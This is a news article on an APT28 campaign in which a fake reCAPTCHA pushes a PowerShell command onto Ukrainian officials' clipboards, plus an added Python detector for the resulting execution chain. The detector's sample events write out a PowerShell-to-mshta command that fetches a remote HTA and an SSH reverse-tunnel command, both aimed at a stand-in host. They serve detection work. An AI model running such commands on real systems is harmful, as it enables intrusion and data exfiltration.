Russian Hackers Trojanize ReCAPTCHA to Target Ukraine

Ukraine Confronts New Cyberattack Vector from Russian GRU-Linked Hackers

Ukraine is facing a new cyberattack threat from hackers linked to Russian military intelligence (GRU) who are targeting local governments. The Computer Emergency Response Team of Ukraine (CERT-UA) uncovered an advanced phishing campaign by the GRU-linked APT28, also known as “Fancy Bear.” The campaign uses an unusual approach in which attackers trick recipients into executing malicious PowerShell commands placed on their clipboard, a method that requires only minimal interaction from the victim.

The emails flagged by CERT-UA were found circulating within local government offices under the guise of “Table Replacement.” Instead of traditional attachments, these emails contain a link that mimics a Google spreadsheet. Upon clicking the link, users are presented with a fake Google reCAPTCHA screen, which copies a malicious PowerShell command to the user’s clipboard without their knowledge.

Subsequently, users are instructed to execute the command by pressing specific keys, leading to the launch of a payload that compromises the system. This tactic demonstrates how APT28 leverages routine tasks and user trust to conceal their malicious intentions.

The CERT-UA analysis revealed that the malicious PowerShell command initiates a sequence that downloads and executes a malicious HTML application called “browser.hta.” This application then runs a PowerShell script designed to steal data from popular browsers and uses an SSH tunnel for data exfiltration to the attackers.
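The chain described above (script host launched from the desktop shell with a remote URL, an HTML application fetched by mshta, then an SSH client started by the script host for the tunnel) leaves a recognisable sequence in endpoint process-creation telemetry. The following is an added detection example written for this article, not code from CERT-UA or from the campaign. It assumes Sysmon-style field names (`ParentImage`, `Image`, `CommandLine`); the sample events and the `placeholder.invalid` host are constructed for the example and are not indicators from the report.

```python
"""Flag the stages of a clipboard-paste ("ClickFix"-style) execution chain in
process-creation records.  Every sample event below is constructed for this
example; field names follow the Sysmon Event ID 1 convention (assumption)."""
import re

URL_RE = re.compile(r"https?://[^\s\"']+", re.IGNORECASE)
# Script hosts a pasted Run-dialog command is likely to invoke.
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "mshta.exe", "cmd.exe", "wscript.exe"}


def basename(path: str) -> str:
    """Lower-cased file name of a Windows path (handles either slash style)."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def check_event(ev: dict) -> list:
    """Return the names of the rules a single process-creation event matches."""
    parent = basename(ev.get("ParentImage", ""))
    image = basename(ev.get("Image", ""))
    cmd = ev.get("CommandLine", "")
    hits = []
    # Rule 1: a script host started straight from the shell (Run dialog / explorer)
    # with a URL in its arguments: the "paste the clipboard into Win+R" step.
    if parent == "explorer.exe" and image in SCRIPT_HOSTS and URL_RE.search(cmd):
        hits.append("shell_launched_script_host_with_url")
    # Rule 2: mshta executing a remote target or an .hta file (the HTA stage).
    if image == "mshta.exe" and (URL_RE.search(cmd) or ".hta" in cmd.lower()):
        hits.append("mshta_remote_hta")
    # Rule 2b: another script host whose command line hands a URL to mshta.
    if (image in SCRIPT_HOSTS and image != "mshta.exe"
            and re.search(r"\bmshta(\.exe)?\b", cmd, re.IGNORECASE) and URL_RE.search(cmd)):
        hits.append("script_host_invokes_mshta_url")
    # Rule 3: the OpenSSH client started by a script host with a tunnel/forward
    # flag (-R remote forward, -L local forward, -D dynamic, -N no command).
    if image == "ssh.exe" and parent in SCRIPT_HOSTS and re.search(r"\s-[RLDN]\b", " " + cmd):
        hits.append("ssh_tunnel_from_script_host")
    return hits


def triage(events: list) -> dict:
    """Evaluate a batch of events; two or more distinct stages seen on one host is
    treated as a likely chain rather than an isolated oddity."""
    alerts = [(i, rule) for i, ev in enumerate(events) for rule in check_event(ev)]
    distinct = {rule for _, rule in alerts}
    verdict = "likely_clickfix_chain" if len(distinct) >= 2 else (
        "isolated_alert" if distinct else "clean")
    return {"alerts": alerts, "distinct_rules": len(distinct), "verdict": verdict}


PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
# Constructed sample telemetry (not real campaign data).
SAMPLE_EVENTS = [
    # 1. Benign: the user opens a browser from the desktop.
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Program Files\Google\Chrome\Application\chrome.exe",
     "CommandLine": "chrome.exe"},
    # 2. Suspicious: script host launched from the shell with a remote URL argument.
    {"ParentImage": r"C:\Windows\explorer.exe", "Image": PS,
     "CommandLine": 'powershell.exe -c "mshta https://placeholder.invalid/browser.hta"'},
    # 3. Suspicious: mshta fetching the HTML application stage.
    {"ParentImage": PS, "Image": r"C:\Windows\System32\mshta.exe",
     "CommandLine": "mshta.exe https://placeholder.invalid/browser.hta"},
    # 4. Suspicious: reverse SSH tunnel started by the script host.
    {"ParentImage": PS, "Image": r"C:\Windows\System32\OpenSSH\ssh.exe",
     "CommandLine": "ssh.exe -N -R 2222:127.0.0.1:22 user@placeholder.invalid"},
]

if __name__ == "__main__":
    for index, rule in triage(SAMPLE_EVENTS)["alerts"]:
        print(f"event {index}: {rule}")
    print(triage(SAMPLE_EVENTS)["verdict"])
```

The parent-process condition in rule 1 is what separates a pasted Run-dialog command from the many legitimate scripts started by schedulers, installers or management agents; rule 3 keys on the tunnel flags rather than on ssh.exe itself, because the OpenSSH client is present on current Windows builds and is commonly used interactively. Tuning for an environment would normally add an allow-list of known script paths and corroborate with the Run dialog's RunMRU history on the host.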

This recent attack is not the first time Ukrainian entities have been targeted by APT28. In a previous incident, the group exploited a Roundcube email vulnerability to redirect email data, compromising government email accounts and transmitting further exploits to Ukrainian defense contacts.

With APT28’s evolving tactics and infrastructure, CERT-UA has advised government agencies to remain vigilant against targeted spear-phishing campaigns that exploit user trust and routine tasks. The indicators of compromise shared by CERT-UA provide valuable insights for organizations to enhance their cybersecurity defenses against such sophisticated threats.
